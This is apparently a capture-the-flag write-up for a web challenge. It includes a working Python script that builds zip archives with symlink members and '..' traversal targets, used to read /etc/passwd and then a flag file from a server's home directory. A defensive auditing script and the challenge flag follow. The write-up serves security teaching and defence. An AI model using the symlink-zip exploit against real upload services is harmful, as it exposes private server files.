Schrödinger

266

Instructions

Hey, my digital cat managed to get into my server and I can’t get him out.

The only thing running on the server is a website a colleague of mine made.

Can you find a way to use the website to check if my cat’s okay? He’ll likely be in the user’s home directory.

You’ll know he’s fine if you find a “flag.txt” file.

By helix (@helix_shift on discord)

Solution

I wrote a quick Python script to generate zip files with symlinks to a target file.

#!/usr/bin/env python3

import sys
import zipfile

def zi(num):
    # Zip member that will be unpacked as a symlink: Unix-created entry
    # (create_system = 3) with mode 0o120755 stored in the high 16 bits of
    # external_attr (2716663808 == 0o120755 << 16).
    zipInfo = zipfile.ZipInfo()
    zipInfo.create_system = 3
    zipInfo.external_attr = 2716663808
    zipInfo.filename = f"/flag{num}"
    return zipInfo

def pi(num, path):
    # Link target: `num` levels of ".." followed by the requested path, so one
    # of the ten entries resolves wherever the archive is extracted.
    x = ['..'] * num
    dots = '/'.join(x)
    return dots + path

if len(sys.argv) != 2:
    print("usage: ./solve.py <path>")
    sys.exit(1)

target_fs_path = sys.argv[1]

with zipfile.ZipFile('payload.zip', 'w') as zipf:
    for n in range(0, 10):
        zipInfo = zi(n)
        path = pi(n, target_fs_path)
        # For a symlink member, the stored "file contents" are the link target.
        zipf.writestr(zipInfo, path)

The challenge indicates that the file will be in a home directory, but a symlink target of ~/flag.txt or $HOME/flag.txt is not expanded to the user’s home directory (tilde and variable expansion are done by the shell, not the filesystem). So instead, I read /etc/passwd to figure out which user’s home directory we needed to target.

/home/copenhagen/flag.txt is the obvious target. Just generate another zip with a symlink to this path.
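From the defender’s side, this is the check an upload handler should run before it extracts anything. The following is an added example written for this writeup, not the original solve script or the challenge website’s code: it audits a zip archive for symlink members (the technique used above), absolute member names and “..” traversal, and returns the findings so the archive can be rejected. The names audit_zip and build_sample are introduced here, and the sample archive is constructed inline so the script runs offline.

```python
#!/usr/bin/env python3
"""Audit a zip archive for members that are unsafe to extract.

Added example (not part of the original writeup): flags symlink members,
absolute paths and '..' traversal so an upload handler can reject the
archive before anything touches the filesystem.
"""
import io
import posixpath
import stat
import zipfile


def _unix_mode(info: zipfile.ZipInfo) -> int:
    # For Unix-created entries the file mode lives in the top 16 bits of
    # external_attr; this is exactly where the solve script plants 0o120755.
    return (info.external_attr >> 16) & 0o177777


def audit_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (member_name, reason) for every member that must not be extracted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if stat.S_ISLNK(_unix_mode(info)):
                # A symlink member's body is its link target; once extracted it
                # lets the application (or a later member) read outside the
                # extraction directory.
                target = zf.read(info).decode("utf-8", "replace")
                findings.append((name, f"symlink -> {target}"))
            if name.startswith("/") or name.startswith("\\"):
                findings.append((name, "absolute path"))
            parts = posixpath.normpath(name.replace("\\", "/")).split("/")
            if ".." in parts:
                findings.append((name, "path traversal"))
    return findings


def build_sample() -> bytes:
    """Constructed sample archive: one benign file, one symlink member of the
    kind the solve script generates, and one member with a traversal name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        link = zipfile.ZipInfo("/flag0")
        link.create_system = 3
        link.external_attr = (stat.S_IFLNK | 0o777) << 16  # symlink, mode 0777
        zf.writestr(link, "/etc/passwd")  # body = link target
        zf.writestr("../../escape.txt", "x")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in audit_zip(build_sample()):
        print(f"REJECT {member!r}: {reason}")
```

Rejecting the whole archive on the first finding is the right response for a web upload: there is no safe way to extract the remaining members once the archive has shown intent to escape the extraction directory, and a single symlink member followed by a normal file with the same path is enough to write through it.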

utflag{No_Observable_Cats_Were_Harmed}